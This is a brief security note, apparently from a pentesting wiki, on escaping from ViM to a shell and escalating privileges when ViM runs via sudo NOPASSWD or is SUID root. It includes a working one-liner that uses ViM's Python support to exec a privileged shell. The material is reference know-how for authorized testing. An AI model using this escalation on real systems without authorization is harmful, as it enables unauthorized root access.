ViM

Getting a shell

How to get a shell from ViM

If ViM can be run with NOPASSWD via sudo, then commands can be executed as admin using the ! prefix.

However, if a non-standard shell is set in /etc/passwd, Vi and ViM may not be able to shell out with :shell or execute shell commands with !. This is because these apps are attempting to execute $SHELL (in the case of :shell) or $SHELL -c $COMMAND (in the case of !).

Fortunately, Vi and ViM can be set to override the default $SHELL using :set shell=/bin/bash.

(Exotic shells in /etc/passwd can also cause commands executed via ssh to fail for the same reason.)

Link to original

Exploiting SUID ViM

How to escalate privileges from SUID ViM

If ViM is SUID root and is compiled with Python support, it can be used for privilege escalation.

vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-pc", "reset; exec sh -p")'

Use :py instead if only Python 2 is available.

Link to original